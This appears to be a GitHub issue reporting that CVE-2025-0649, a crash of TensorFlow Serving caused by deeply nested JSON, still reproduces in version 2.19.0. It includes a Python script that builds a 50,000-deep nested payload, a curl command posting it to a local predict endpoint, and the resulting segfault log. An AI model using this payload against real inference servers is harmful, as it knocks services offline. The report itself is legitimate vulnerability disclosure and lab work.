**CVE-2025-0649** - I think this issue still exists in version 2.19.0 - At least my lab suggests it is. #4116
Description
I am working on my book on adversarial AI: https://www.securitynik.com/2025/06/coming-soon-free-little-book-on.html and as part of that book I am talking about attacking the inference endpoint. As expected, version 2.18.0 of TF Serving is vulnerable to the JSON issue. We know this. However, when I try to show the mitigation is upgrading to 2.19.0, unfortunately this version also crashes.
Here is my code to create the file:
# Increase recurse_depth to 50_000
recurse_depth = 50_000
# Create a file on the file system
with open(file="/tmp/tf_serv_vuln.json", mode="w") as f:
# Write to the file
# This information should look similary to what you say earlier
f.write('{"instances": ' + ('[' * recurse_depth) + '0.5' + (']' * recurse_depth) + '}')
# verify the file has been created
!ls /tmp/tf_serv_vuln.json
Here is my curl command:
curl --request POST "http://localhost:8501/v1/models/vuln_tf_serv:predict" --header "Content-Type: application/json" --header "User-agent: securitynik_adversarial_ai_lab" --data-binary @/tmp/tf_serv_vuln.json
Here is the result to my curl command:
curl: (52) Empty reply from server
Here is the output from TF Serving console
[evhttp_server.cc : 261] NET_LOG: Entering the event loop ...
/usr/bin/tf_serving_entrypoint.sh: line 3: 7 Segmentation fault (core dumped) tensorflow_model_server --port=8500 --rest_api_port=8501 --model_name=${MODEL_NAME} --model_base_path=${MODEL_BASE_PATH}/${MODEL_NAME} "$@" ```
Here is my docker information:
sudo docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
tensorflow/serving 2.19.0 d871e064642e 2 months ago 729MB
here is also how I served the image:
``` sudo docker run --rm -p 8501:8501 --name=tfserving -v "/tmp/models/my_model:/models/vuln_tf_serv" -e MODEL_NAME=vuln_tf_serv tensorflow/serving:2.19.0```
Let me know if did something wrong on my end. Would love to know what I might have missed.